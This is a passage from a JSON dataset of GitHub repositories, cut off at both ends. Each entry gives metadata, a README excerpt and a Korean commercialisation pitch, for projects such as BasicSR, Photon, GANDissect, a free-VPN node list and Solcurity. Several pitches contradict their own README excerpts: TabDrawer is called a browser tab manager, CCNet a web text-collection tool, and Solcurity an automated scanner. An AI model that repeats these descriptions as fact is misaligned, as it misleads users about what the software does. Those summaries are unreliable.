tasks and manages their schedules. Tasks can be ingested from around the web, via APIs or embedded iframes, or through various services running on your local computer. You can complete scheduled tasks in desktop, mobile, and web applications. A backend service syncs user data and orchestrates notifications.\n\nYou should also understand that Orbit is ","composite_score":0.5114,"license_safety_tag":"unknown"},{"name":"Azure/DeepLearningForTimeSeriesForecasting","github_url":"https://github.com/Azure/DeepLearningForTimeSeriesForecasting","stars":5,"language":"Jupyter Notebook","license":"MIT","abandonment_months":67,"description":"# Azure/DeepLearningForTimeSeriesForecasting 분석\n\n## 왜 보물인가\n미래의 판매량, 주가, 날씨 같은 시간에 따라 변하는 데이터를 정확하게 예측할 수 있는 AI 기술을 누구나 쓸 수 있도록 만들어놨습니다.\n\n## 어디에 쓸 수 있나\n\n1. **재고 관리 SaaS**: 온라인 쇼핑몰 운영자들이 수요를 미리 예측해 불필요한","readme_excerpt":"# Deep Learning for Time Series Forecasting\n\nA collection of examples for using DNNs for time series forecasting with Keras. The examples include:\n\n- **0_data_setup.ipynb** - set up data that are needed for the experiments\n- **1_CNN_dilated.ipynb** - dilated convolutional neural network model that predicts one step ahead with univariate time series\n- **2_RNN.ipynb** - recurrent neural network model that predicts one step ahead with univariate time series\n- **3_RNN_encoder_decoder.ipynb** - a simple recurrent neural network encoder-decoder approach to multi-step forecasting\n- **4_ES_RNN.ipynb** - a simplified exponential smoothing recurrent neural network model that predicts one step ahead with univariate time series\n\n... and a number of hands-on exercises and demos.\n\n\n## Data\n\nThe data in all examples is from the GEFCom2014 energy forecasting competition<sup>1</sup>. It consists of 3 years of hourly electricity load data from the New England ISO and also includes hourly temperature dat","composite_score":0.5114,"license_safety_tag":"safe"},{"name":"alanzhangzm/Photon","github_url":"https://github.com/alanzhangzm/Photon","stars":12,"language":"JavaScript","license":"Apache-2.0","abandonment_months":48,"description":"# Photon 저장소 분석\n\n## 왜 보물인가\n사진이나 이미지를 빠르고 효율적으로 처리할 수 있는 도구로, 대량의 이미지를 다루는 기업들이 찾는 기술입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 온라인 사진 편집 플랫폼이나 이미지 최적화 서비스로 구독 기반 제공\n- **내부 업무 도구**: 전자상거래 회사의 상품 이미지 자동 처리 및 품","readme_excerpt":"Languages: [English](https://github.com/alanzhangzm/Photon) [中文](https://github.com/alanzhangzm/Photon/blob/master/README.zh-CN.md)\n\n# Photon\n\n*Photon* is a lightweight multi-threaded downloader based on [aria2](https://github.com/aria2/aria2). It supports **HTTP/HTTPS**, **Magnet links**, **BitTorrent** and **Metalink**.\n\n*Photon* is cross platform. It has **macOS** and **Windows** releases now and will have Linux release soon.\n\nFor Web frontend of aria2, please have a look at [*Photon WebUI*](https://github.com/alanzhangzm/Photon-WebUI).\n\n## Installation\n\nLatest releases: https://github.com/alanzhangzm/Photon/releases\n\n## Screenshots\n\n**Mac**\n\n![mac-downloading](screenshot/mac-downloading.png)\n\n\n## Extensions\n\nSince *Photon* uses aria2 as download core, all of the extensions that support aria2 via RPC are also *Photon* compatible.\n\nThe default RPC configuration for *Photon* and aria2:\n- URL: http://127.0.0.1:6800/jsonrpc\n- Host: 127.0.0.1\n- Port: 6800\n\nSome popular extensions:\n- [Bai","composite_score":0.5114,"license_safety_tag":"safe"},{"name":"CSAILVision/gandissect","github_url":"https://github.com/CSAILVision/gandissect","stars":16,"language":"Python","license":"MIT","abandonment_months":61,"description":"# gandissect 저장소 분석\n\n## 왜 보물인가\nAI가 어떻게 이미지를 인식하는지 내부 작동 원리를 시각적으로 보여주는 도구로, AI의 '블랙박스'를 투명하게 만드는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: AI 모델 감시 및 검증 플랫폼으로 기업들이 자신의 AI 시스템이 올바르게 작동하는지 확인하는 웹 서비스\n2. **","readme_excerpt":"# GANDissect <a href=\"http://gandissect.res.ibm.com/ganpaint.html?project=churchoutdoor&layer=layer4\"><img src='doc/ganpaint.gif' align=\"right\" height=\"259\"></a>\n\n[**Project**](https://gandissect.csail.mit.edu/) | [**Demo**](http://gandissect.res.ibm.com/ganpaint.html?project=churchoutdoor&layer=layer4) | [**Paper**](https://arxiv.org/pdf/1811.10597.pdf) | [**Video**](http://tiny.cc/gandissect) <br>\n\n[GAN Dissection](https://gandissect.csail.mit.edu/) is a way to inspect the internal representations of a generative adversarial network (GAN) to understand how internal units align with human-interpretable concepts. It is part of [NetDissect](https://netdissect.csail.mit.edu/).\n\nThis repo allows you to dissect a GAN model. It provides the dissection results as a static summary or as an interactive visualization. Try our interactive [GANPaint demo](http://gandissect.res.ibm.com/ganpaint.html?project=churchoutdoor&layer=layer4) to interact with GANs and draw images. \n\n## Overview\n\n<img src=","composite_score":0.5114,"license_safety_tag":"safe"},{"name":"ayush714/ML001-Project-Sources-Code-and-Learning-Materials","github_url":"https://github.com/ayush714/ML001-Project-Sources-Code-and-Learning-Materials","stars":5,"language":"Jupyter Notebook","license":"unknown","abandonment_months":32,"description":"# ML001-Project-Sources-Code-and-Learning-Materials 상용화 분석\n\n## 왜 보물인가\n머신러닝 초보자들이 실제 프로젝트를 따라하며 배울 수 있는 학습 자료와 실행 가능한 코드를 한곳에 모아둔 교육용 자산입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 학습 플랫폼**: 유데미, 코세라 같은 강의 플랫폼에서 \"머신러닝","readme_excerpt":"# ML001 (ML In Depth) \n\nIn this course, you will learn from basics of machine learning to advanced level in machine learning, you will understand both theory + practical, you will work on building real world machine learning systems, and formulating the machine learning problem, we covered everything one needs to know about machine learning talking about theory as well as practicals. Students also given problem sets that contains both technical and theoretical questions. It takes a lot of time to develop all of this, it will be very helpful for me if you watch this course on Newera and subscribe the channel.\n\nThis Course is developed by Ayush Singh by [Newera](https://youtube.com/c/neweraa/?sub_confirmation=1), Subscribe this channel for further courses. \n\nCourse Website:- https://ml001.netlify.app/\nML001 Syllabus:- https://ml001.netlify.app/pages/syllabus.html\n\n__About the Instructor__:-  \nAyush Singh \n\nI am a Data Scientist Intern at Artifact and ML Engineer at Omdena. I am CEO and F","composite_score":0.5113,"license_safety_tag":"unknown"},{"name":"gnab/remark","github_url":"https://github.com/gnab/remark","stars":6,"language":"JavaScript","license":"mit","abandonment_months":24,"description":"# gnab/remark 저장소 분석\n\n## 왜 보물인가\n텍스트를 구조화하고 처리하는 오픈소스 도구로, 콘텐츠 자동화가 필요한 회사들이 기술 기반으로 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **마크다운 변환 SaaS**: 블로거와 작가가 글을 여러 형식으로 자동 변환하는 웹서비스\n2. **콘텐츠 관리 API**: 뉴스사와 출판사가 기사를 다양","readme_excerpt":"# remark\n\n[![Build Status](https://travis-ci.org/gnab/remark.svg?branch=develop)](https://travis-ci.org/gnab/remark)\n[![CDNJS](https://img.shields.io/cdnjs/v/remark.svg)](https://cdnjs.com/libraries/remark)\n[![xscode](https://img.shields.io/badge/Available%20on-xs%3Acode-blue?style=?style=plastic&logo=appveyor&logo=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAMAAACdt4HsAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAAZQTFRF////////VXz1bAAAAAJ0Uk5T/wDltzBKAAAAlUlEQVR42uzXSwqAMAwE0Mn9L+3Ggtgkk35QwcnSJo9S+yGwM9DCooCbgn4YrJ4CIPUcQF7/XSBbx2TEz4sAZ2q1RAECBAiYBlCtvwN+KiYAlG7UDGj59MViT9hOwEqAhYCtAsUZvL6I6W8c2wcbd+LIWSCHSTeSAAECngN4xxIDSK9f4B9t377Wd7H5Nt7/Xz8eAgwAvesLRjYYPuUAAAAASUVORK5CYII=)](https://xscode.com/gnab/remark)\n[![Donate](https://www.paypalobjects.com/en_US/i/btn/btn_donate_SM.gif)](https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=4ADT275DY7JTG)\n\nA simple, in-browser, markdown-driven slideshow tool targeted at people who know their way around HT","composite_score":0.5113,"license_safety_tag":"safe"},{"name":"speedinghzl/CCNet","github_url":"https://github.com/speedinghzl/CCNet","stars":10,"language":"Python","license":"MIT","abandonment_months":63,"description":"# CCNet 저장소 분석\n\n## 왜 보물인가\n인터넷에서 대규모 텍스트 데이터를 효율적으로 수집하고 정제하는 기술로, AI 학습에 필요한 고품질 데이터를 자동으로 준비할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업이 자사 문서/웹사이트에서 자동으로 학습 데이터를 추출하는 클라우드 도구\n2. **내부 업무 도구**: 대규모 고","readme_excerpt":"# CCNet: Criss-Cross Attention for Semantic Segmentation\n\nPaper Links: [**Our most recent TPAMI version with improvements and extensions**](https://arxiv.org/abs/1811.11721) ([*Earlier ICCV version*](https://openaccess.thecvf.com/content_ICCV_2019/html/Huang_CCNet_Criss-Cross_Attention_for_Semantic_Segmentation_ICCV_2019_paper.html)).\n\nBy [Zilong Huang](http://speedinghzl.github.io), [Xinggang Wang](http://www.xinggangw.info/index.htm), [Yunchao Wei](https://weiyc.github.io/), [Lichao Huang](https://scholar.google.com/citations?user=F2e_jZMAAAAJ&hl=en), [Chang Huang](https://scholar.google.com/citations?user=IyyEKyIAAAAJ&hl=zh-CN), [Humphrey Shi](https://www.humphreyshi.com/), [Wenyu Liu](http://mclab.eic.hust.edu.cn/MCWebDisplay/PersonDetails.aspx?Name=Wenyu%20Liu) and [Thomas S. Huang](http://ifp-uiuc.github.io/).\n\n### Updates\n\n****2021/02: The pure python implementation of CCNet is released in the branch [pure-python](https://github.com/speedinghzl/CCNet/tree/pure-python). Thanks [S","composite_score":0.5113,"license_safety_tag":"safe"},{"name":"fqshare/free-ssr-v2ray-vpn","github_url":"https://github.com/fqshare/free-ssr-v2ray-vpn","stars":498,"language":"","license":"unknown","abandonment_months":75,"description":"# fqshare/free-ssr-v2ray-vpn 분석\n\n## 왜 보물인가\n인터넷 검열이 심한 지역에서 자유로운 네트워크 접근을 가능하게 하는 오픈소스 도구로, 글로벌 수요가 높습니다.\n\n## 어디에 쓸 수 있나\n1. **VPN 서비스 SaaS**: 개인 사용자용 구독형 VPN 앱으로 월간 이용료 수익 모델 구축\n2. **기업 원격접속 도구**: 검열 지","readme_excerpt":"# free-ssr-v2ray-vpn\n\n项目一直在更新中，可以点个star，不怕上不了网🚀\n\n## 免费节点（为了安全，用了emoji链接，点击后会做跳转）\n<br>↓↓↓SSR↓↓↓<br><br>\n[onessr🔥](http://🚣🐶🐊🐰🦈🖕🚰🐭.🍕💩.ws)<br>\n[ssrtool](http://🤠🥖🐟🐔🍇🐶🍇🐈.🍕💩.ws)<br>\n[放牧的风](http://👆🎩🍝🏳🎾🌂🐪🍪.🍕💩.ws)<br>\n[iShadow](http://🐏🐘🌯🍌🌾🍻🐙🎸.🍕💩.ws)<br>\n[go2free](http://🎾🏂🎮🌽🌚🐊🍻🐹.🍕💩.ws)\n\n<br>↓↓↓V2RAY↓↓↓<br><br>\n[Free Vmess](http://🐵🌈👞🐢🐹💦⚽👍.🍕💩.ws)<br>\n[Free Air](http://🤒🤖💯☠⚾🐬🏈💩.🍕💩.ws)\n\n<br><br>\n## 白嫖机场\n[🛫极速vpn](http://🧀⛺🐌🎁🐁♠🏄🎪.🍕💩.ws)<br>\n[🍄蘑菇云](http://🐩🐹🐥💣🐶🍵🦇👉.🍕💩.ws)<br>\n[🐹阿狸云](http://🍕👑🍍🚣🐤🎡⌚🐹.🍕💩.ws)<br>\n[🐔养鸡场](http://👆🕶🤢🐐🦐⭕⛺🌎.🍕💩.ws)<br>\n<br>\n\n## 电报群\n[https://t.me/s/SSRlist](https://t.me/s/SSRlist)<br>\n[https://t.me/s/gyjclub](https://t.me/s/gyjclub)<br>\n[https://t.me/s/onessr](https://t.me/s/onessr)<br>\n[https://t.me/AC_FFree](https://t.me/AC_FFree)<br>\n<br>\n\n## 其他\n<br><br>\n\n## 免责声明\n本项目只进行网路收集，为海外华人科研学习带来方便，<br>\n切勿用于其他用途中国国内居民请自觉关闭并在24小时之<br>\n内删掉与本项目相关的一切内容，如有问题，该项目作者概不负责\n","composite_score":0.5113,"license_safety_tag":"unknown"},{"name":"Rari-Capital/solcurity","github_url":"https://github.com/Rari-Capital/solcurity","stars":8,"language":"","license":"unknown","abandonment_months":35,"description":"# Rari-Capital/solcurity 분석 보고서\n\n## 왜 보물인가\n블록체인 스마트 계약의 보안 취약점을 자동으로 찾아주는 감시 도구로, 암호화폐 거래소와 금융 서비스의 자산 손실을 사전에 방지할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 암호화폐 거래소들이 월 구독으로 자신들의 스마트 계약 보안을 지속적으로 모니터링\n","readme_excerpt":"# The Solcurity Standard \n\nOpinionated **security** and **code quality** standard for **Solidity smart contracts**. \n\n_Based off work by [BoringCrypto](https://github.com/sushiswap/bentobox/blob/master/documentation/checks.txt), [Mudit Gupta](https://www.youtube.com/watch?v=LLiJK_VeAvQ), [Runtime Verification](https://github.com/runtimeverification/verified-smart-contracts/wiki/List-of-Security-Vulnerabilities), and [ConsenSys Diligence](https://consensys.github.io/smart-contract-best-practices/attacks/)_.\n\n### General Review Approach:\n- Read the project's docs, specs, and whitepaper to understand what the smart contracts are meant to do.\n- Construct a mental model of what you expect the contracts to look like before checking out the code.\n- Glance over the contracts to get a sense of the project's architecture. Tools like Surya can come in handy.\n- Compare the architecture to your mental model. Look into areas that are surprising.\n- Create a threat model and make a list of theoretical","composite_score":0.5113,"license_safety_tag":"unknown"},{"name":"winslowdibona/TabDrawer","github_url":"https://github.com/winslowdibona/TabDrawer","stars":499,"language":"Swift","license":"MIT","abandonment_months":123,"description":"# TabDrawer 상용화 분석\n\n## 왜 보물인가\n웹 브라우저의 탭 관리를 편하게 해주는 도구로, 수백 개의 탭을 정리하느라 헤매는 사용자들의 실제 문제를 해결합니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n- 브라우저 확장 프로그램으로 구독 모델 운영 (월 구독료로 프리미엄 기능 제공)\n\n**2. 내부 업무 도구**\n- 대량의 웹 페","readme_excerpt":"# TabDrawer\n\n[![Version](https://img.shields.io/cocoapods/v/TabDrawer.svg?style=flat)](http://cocoapods.org/pods/TabDrawer)\n[![License](https://img.shields.io/cocoapods/l/TabDrawer.svg?style=flat)](http://cocoapods.org/pods/TabDrawer)\n[![Platform](https://img.shields.io/cocoapods/p/TabDrawer.svg?style=flat)](http://cocoapods.org/pods/TabDrawer)\n\n![Options Example](https://github.com/winslowdibona/TabDrawer/blob/master/OptionsExample.gif)\n\n\nTabDrawer is a customizable TabBar UI element that allows you to run a block of code upon TabBarItem selection, or display a customizable drawer. TabBar uses [EasyPeasy](https://github.com/nakiostudio/EasyPeasy) for managing auto-layout constraints. Icons used for the examples are from [icons8](https://icons8.com/)\n\n## Usage\n\nTo run the example project, clone the repo, and run `pod install` from the Example directory first.\nMore usage details and examples coming soon. For now checkout the OptionsExampleViewController class for an example inspired by ","composite_score":0.5111,"license_safety_tag":"safe"},{"name":"xinntao/BasicSR","github_url":"https://github.com/xinntao/BasicSR","stars":9,"language":"Python","license":"Apache-2.0","abandonment_months":22,"description":"# BasicSR 상용화 분석\n\n## 왜 보물인가\n흐릿하거나 품질이 낮은 사진을 선명하고 깔끔하게 만들어주는 AI 기술로, 온라인 쇼핑몰부터 의료 영상까지 다양한 분야에서 수익 창출이 가능합니다.\n\n## 어디에 쓸 수 있나\n**1. 사진 편집 SaaS:** 일반인이 휴대폰으로 촬영한 저화질 사진을 자동으로 고품질로 복원해주는 웹 서비스 (월 구독형)\n\n**","readme_excerpt":"<p align=\"center\">\n  <img src=\"assets/basicsr_xpixel_logo.png\" height=120>\n</p>\n\n## <div align=\"center\"><b><a href=\"README.md\">English</a> | <a href=\"README_CN.md\">简体中文</a></b></div>\n\n<div align=\"center\">\n\n[![LICENSE](https://img.shields.io/github/license/xinntao/basicsr.svg)](https://github.com/xinntao/BasicSR/blob/master/LICENSE.txt)\n[![PyPI](https://img.shields.io/pypi/v/basicsr)](https://pypi.org/project/basicsr/)\n[![Language grade: Python](https://img.shields.io/lgtm/grade/python/g/xinntao/BasicSR.svg?logo=lgtm&logoWidth=18)](https://lgtm.com/projects/g/xinntao/BasicSR/context:python)\n[![python lint](https://github.com/xinntao/BasicSR/actions/workflows/pylint.yml/badge.svg)](https://github.com/xinntao/BasicSR/blob/master/.github/workflows/pylint.yml)\n[![Publish-pip](https://github.com/xinntao/BasicSR/actions/workflows/publish-pip.yml/badge.svg)](https://github.com/xinntao/BasicSR/blob/master/.github/workflows/publish-pip.yml)\n[![gitee mirror](https://github.com/xinntao/BasicSR/act","composite_score":0.5111,"license_safety_tag":"safe"},{"name":"dart-code-checker/dart-code-metrics","github_url":"https://github.com/dart-code-checker/dart-code-metrics","stars":6,"language":"Dart","license":"NOASSERTION","abandonment_months":35,"description":"# Dart Code Checker 분석 보고서\n\n## 왜 보물인가\n프로그래머들이 작성한 코드의 오류를 자동으로 찾아내고 품질을 평가하는 도구로, 소프트웨어 개발 생산성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 개발팀이 클라우드에서 코드를 업로드하면 자동으로 품질 점수와 개선 사항을 받는 웹서비스\n2. **내부 ","readme_excerpt":"<img\n  src=\"https://raw.githubusercontent.com/dart-code-checker/dart-code-metrics/master/assets/logo.svg\"\n  alt=\"DCM logo\"\n  height=\"150\" width=\"150\"\n  align=\"right\">\n\n# Dart Code Metrics\n\nThis package has been discontinued and is no longer maintained.\n\nTo continue using Dart Code Metrics, visit our website to purchase a license <https://dcm.dev/pricing/>.\n\nIf you were a Dart Code Metrics contributor, you can receive a special license. Feel free to contact <info@dcm.dev>.\n","composite_score":0.5111,"license_safety_tag":"unknown"},{"name":"beiliangshizi/China_House","github_url":"https://github.com/beiliangshizi/China_House","stars":244,"language":"","license":"unknown","abandonment_months":32,"description":"# China_House 저장소 분석\n\n## 왜 보물인가\n중국 부동산 시장의 방대한 데이터를 체계적으로 정리해놓아, 부동산 투자자나 연구자들이 시장 분석에 필요한 정보를 쉽게 접근할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **부동산 분석 SaaS 서비스**: 이 데이터를 기반으로 중국 집값 추이, 지역별 투자 기회를 보여주는 웹 대시보드 판매\n2.","readme_excerpt":"# China_House\r\n----------\r\n## 买房常识 & 工具\r\n- [Fang](https://github.com/Wahitler/Fang)：买房的小知识，户型、房型。\r\n- [Buying-a-house-in-Hangzhou-in-2016](https://github.com/chahuilin/Buying-a-house-in-Hangzhou-in-2016)：买房费用记录。\r\n- [HousePricingOfBeijing](https://github.com/hetianle/HousePricingOfBeijing) ：基于SOA架构的北京丝房价地理信息系统，提供北京市海量房源数据的位置信息和属性信息的空间可视化展示，房源位置、属性及其周边的查询筛选\r\n- [you-need-know-house_knowledge](https://github.com/fairyly/you-need-know-house_knowledge)：程序员需要知道的房产信息。\r\n\r\n\r\n## 各地买房\r\n- 北京\r\n\t+ [beijing_house_knowledge](https://github.com/facert/beijing_house_knowledge)：北京买房攻略。\r\n\t+ [2ndhand_house](https://github.com/pingao777/2ndhand_house)：北京二手房价数据分析。\r\n\t+ [Beijing-housePrice-income](https://github.com/siseventeen/Beijing-housePrice-income)：北京房价与收入关系图。\r\n\t+ [house_price](https://github.com/liangkw16/house_price)：北京房价可视化分析。\r\n\t+ **[HousePricingOfBeijing](https://github.com/hetianle/HousePricingOfBeijing)**：一个基于SOA架构的北京丝房价地理信息系统，提供北京市海量房源数据的位置信息和属性信息的空间可视化展示，房源位置、属性及其周边的查询筛选，包括每一处房源周边重要的基础设施（学校、公交车站、地铁","composite_score":0.511,"license_safety_tag":"unknown"},{"name":"karalabe/xgo","github_url":"https://github.com/karalabe/xgo","stars":5,"language":"Shell","license":"mit","abandonment_months":54,"description":"# karalabe/xgo 분석 보고서\n\n## 왜 보물인가\n복잡한 소프트웨어를 여러 운영체제(윈도우, 맥, 리눅스)에서 동시에 구동할 수 있도록 자동으로 준비해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 소프트웨어 개발사가 고객들의 다양한 컴퓨터 환경에 맞춘 버전을 빠르게 제공하는 배포 자동화 서비스\n- **내부 업무 도구**:","readme_excerpt":"# xgo - Go CGO cross compiler\n\nAlthough Go strives to be a cross platform language, cross compilation from one\nplatform to another is not as simple as it could be, as you need the Go sources\nbootstrapped to each platform and architecture.\n\nThe first step towards cross compiling was Dave Cheney's [golang-crosscompile](https://github.com/davecheney/golang-crosscompile)\npackage, which automatically bootstrapped the necessary sources based on your\nexisting Go installation. Although this was enough for a lot of cases, certain\ndrawbacks became apparent where the official libraries used CGO internally: any\ndependency to third party platform code is unavailable, hence those parts don't\ncross compile nicely (native DNS resolution, system certificate access, etc).\n\nA step forward in enabling cross compilation was Alan Shreve's [gonative](https://github.com/inconshreveable/gonative)\npackage, which instead of bootstrapping the different platforms based on the\nexisting Go installation, downloaded t","composite_score":0.511,"license_safety_tag":"safe"},{"name":"tylergaw/icon-stamper","github_url":"https://github.com/tylergaw/icon-stamper","stars":500,"language":"","license":"unknown","abandonment_months":123,"description":"# Icon Stamper 분석\n\n## 왜 보물인가\n아이콘(작은 그림 기호)을 빠르고 쉽게 만들고 관리할 수 있는 도구로, 웹사이트나 앱을 만드는 사람들의 반복적인 작업을 크게 줄여줍니다.\n\n## 어디에 쓸 수 있나\n\n**1. 디자인 도구 SaaS**\n온라인에서 직접 아이콘을 만들고 다운로드하는 구독형 서비스로, 디자이너들의 월정액 수입원이 될 수 있습니다","readme_excerpt":"# Sketch Icon Stamper Plugin\n\n## What Does It Do?\n\nTakes full sized art for an icon and creates multiple sizes of it so you don't\nhave to.\n\nDemo [https://vimeo.com/97067332](https://vimeo.com/97067332)\n[![Screenshot of demo video](http://f.cl.ly/items/3V0d0F1h3m1h2H0u1s2r/icon-stamper.png)](https://vimeo.com/97067332)\n\n## Installation\nThere are two different ways to install Icon Stamper. Official Sketch Plugin installation\ndocumentation can be found in the [plugin docs](http://bohemiancoding.com/sketch/support/developer/01-introduction/01.html).\n\n### Git clone (best way to go)\n - Using a command line app (Terminal, iTerm, etc) navigate to the Sketch Plugins\n directory. This is different depending on your set up. If you're unsure, open\n Sketch and go to the Plugins menu > Reveal Plugins Folder\n - Once you're in the Plugins directory `git clone https://github.com/tylergaw/icon-stamper.git` or your fork.\n - You can find the plugins in the Plugins Menu > icon-stamper\n\n### Zip download\n - I","composite_score":0.511,"license_safety_tag":"unknown"},{"name":"ramesaliyev/trigonoparty","github_url":"https://github.com/ramesaliyev/trigonoparty","stars":500,"language":"JavaScript","license":"ISC","abandonment_months":77,"description":"# Trigonoparty 상용화 분석\n\n## 왜 보물인가\n삼각함수(수학의 기본 개념)를 시각적으로 배우고 실험할 수 있는 인터랙티브 도구로, 수학 교육 시장과 엔지니어링 도구 시장 모두에서 수요가 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **수학 교육 SaaS**: 중고등학교의 온라인 수학 강의 플랫폼에 내장하여 학생들이 삼각함수를 직관적으로 이해하도","readme_excerpt":"# Trigonoparty!\nSimple trigonometry visualisation with only 4 file long pure front-end. Dont be shy, [go play with it ->](https://ramesaliyev.com/trigonoparty/)\n\n![Screen Gif](http://g.recordit.co/Xd4MztYltr.gif)\n","composite_score":0.511,"license_safety_tag":"safe"},{"name":"torchgm/RoundedTB","github_url":"https://github.com/torchgm/RoundedTB","stars":5,"language":"C#","license":"GPL-3.0","abandonment_months":32,"description":"# RoundedTB 상용화 분석\n\n## 왜 보물인가\n윈도우 작업표줄을 더 현대적이고 세련되게 만드는 간단한 도구로, 컴퓨터를 쓰는 모든 사람들이 원하는 기능입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업용 윈도우 커스터마이징 플랫폼으로, IT팀이 직원 컴퓨터를 일괄 관리하면서 사용자 만족도를 높일 수 있습니다.\n2. **내부 업무 ","readme_excerpt":"![RoundedTB](https://cdn.discordapp.com/attachments/272509873479221249/891555515799318568/unknown.png)\n\n# RoundedTB\n#### Add margins, rounded corners and segments to your taskbars!\n\n![image](https://user-images.githubusercontent.com/31840547/134795141-76349eaf-12da-40f8-b2a0-d7b7c268d152.png)\n\n\n## How do I get it?\nThe easiest way to download RoundedTB is from the [Microsoft Store](https://www.microsoft.com/store/productId/9MTFTXSJ9M7F). You can also download the latest version from the Releases tab, unzip it and run `RoundedTB.exe`. If you're a madman, you can compile it yourself or check out the latest [Canary build](https://nightly.link/torchgm/RoundedTB/workflows/ci/master/rtb-artifacts.zip) (note these can be very unfinished, buggy and unstable).\n\n## To use\n### Basic options\nThe simplest way to use RoundedTB is by simply entering a margin and corner radius.\n - **Margin** - controls how many pixels to remove from each side of the taskbar, creating a margin around it that you can see","composite_score":0.511,"license_safety_tag":"restricted"},{"name":"jVirus/ios-learning-materials","github_url":"https://github.com/jVirus/ios-learning-materials","stars":5,"language":"Swift","license":"MIT","abandonment_months":24,"description":"# iOS 학습 자료 저장소 분석\n\n## 왜 보물인가\n아이폰 앱 개발을 배우고 싶은 초보자들을 위해 체계적으로 정리된 교육 자료 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 코딩 학습 플랫폼**: 아이폰 앱 개발 강좌 콘텐츠로 활용하여 구독형 교육 서비스 운영\n2. **기업 내부 교육 도구**: IT 회사에서 신입사원 온보딩이나 팀 스킬 향상 자","readme_excerpt":"# ios-learning-materials [![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome)\n\n![GitHub last commit](https://img.shields.io/github/last-commit/jvirus/ios-learning-materials?label=Last%20Commit)\n[![Language](https://img.shields.io/badge/Language-Swift-green.svg)]()\n[![Founded](https://img.shields.io/badge/Founded-August_2017-ff69b4.svg)]()\n[![Materials](https://img.shields.io/badge/Materials-2196-important.svg)]()\n[![MajorTopics](https://img.shields.io/badge/Major_Topics-83-red.svg)]()\n[![NLOC](https://img.shields.io/tokei/lines/github/jvirus/ios-learning-materials)]()\n[![Contributors](https://img.shields.io/github/contributors/eleev/ios-learning-materials)]()\n[![Repo Size](https://img.shields.io/github/repo-size/eleev/ios-learning-materials)]()\n[![License](https://img.shields.io/badge/License-MIT-blue.svg)]()\n\n![](eleev-midjourney-infinite-library.jpeg)\n\n### If you like the project, p","composite_score":0.511,"license_safety_tag":"safe"},{"name":"gohypergiant/IAPKit","github_url":"https://github.com/gohypergiant/IAPKit","stars":499,"language":"C","license":"MIT","abandonment_months":74,"description":"# IAPKit 분석 리포트\n\n## 왜 보물인가\n애플 앱스토어에서 유료 구독 기능을 쉽게 관리할 수 있도록 만든 도구로, 앱 개발자들의 매출 구조를 간편하게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 모바일 앱에서 월간/연간 구독 결제 시스템을 자동으로 관리하는 백엔드 솔루션\n2. **내부 업무 도구**: 앱스토어 결제 인증 및","readme_excerpt":"# IAPKit\n\n[![license](https://img.shields.io/github/license/blackpixel/IAPKit.svg)](https://opensource.org/licenses/MIT)\n[![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg)](.github/CONTRIBUTING.md)\n\nA simple approach to Apple In App Purchases (IAP) that handles the presentation of products, purchasing, receipt validation, and timed free trials.\n\nIAPKit is used by [Kaleidoscope 2](https://www.kaleidoscopeapp.com) and [Pixelboard](https://www.getpixelboardapp.com) on iPad.\n\n### Requirements\n\n- An app running iOS 11+\n- StoreKit\n\n### Features\n\n- Supports SafeArea Layout\n- Supports Multitasking on iPad\n\n## Release Notes\n\n[Release notes](releaseNotes.md)\n\n## Examples\n\n![iPhone Portrait](/ReadMeImages/iPhonePortrait.png)\n![iPhone Landscape](/ReadMeImages/iPhoneLandscape.png)\n![iPad Portrait](/ReadMeImages/iPadPortrait.png)\n![iPad Split Screen](/ReadMeImages/iPadSplitScreen.png)\n\n## Installation\n\nSimply grab the framework (either via git submodule or another package mana","composite_score":0.5109,"license_safety_tag":"safe"},{"name":"The-AI-Summer/Deep-Learning-In-Production","github_url":"https://github.com/The-AI-Summer/Deep-Learning-In-Production","stars":15,"language":"Jupyter Notebook","license":"unknown","abandonment_months":37,"description":"# The-AI-Summer/Deep-Learning-In-Production 분석\n\n## 왜 보물인가\n인공지능 모델을 실제 서비스에 배포하는 방법을 배울 수 있는 실용적인 교육 자료로, AI 기술을 비즈니스화하려는 스타트업과 기업들에게 필수 정보를 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **AI 교육 SaaS**: 학생과 직장인을 위한 온라인 강좌 ","readme_excerpt":"# Deep Learning In Production Book\n\n### **You can know grab a copy of the book from here:**\n  - **Amazon**: [Paperback and Kindle](https://amzn.to/3oa50Vj)\n  - **Leanpub**: [Epub and Pdf](https://leanpub.com/DLProd)\n\n#### Build, train, deploy, scale and maintain deep learning models. Understand ML infrastructure and MLOps using hands-on examples.\n\n**What you will learn?**\n\n- Best practices to write Deep Learning code\n- How to unit test and debug Machine Learning code\n- How to build and deploy efficient data pipelines\n- How to serve Deep Learning models\n- How to deploy and scale your application\n- What is MLOps and how to build end-to-end pipelines\n\n**Who is this book for?**\n\n- Software engineers who are starting out with deep learning\n- Machine learning researchers with limited software engineering background\n- Machine learning engineers who seek to strengthen their knowledge\n- Data scientists who want to productionize their models and build customer-facing applications\n\n**What tools y","composite_score":0.5109,"license_safety_tag":"unknown"},{"name":"Ramotion/circle-menu-android","github_url":"https://github.com/Ramotion/circle-menu-android","stars":12,"language":"Java","license":"MIT","abandonment_months":48,"description":"# Circle Menu Android - 보물 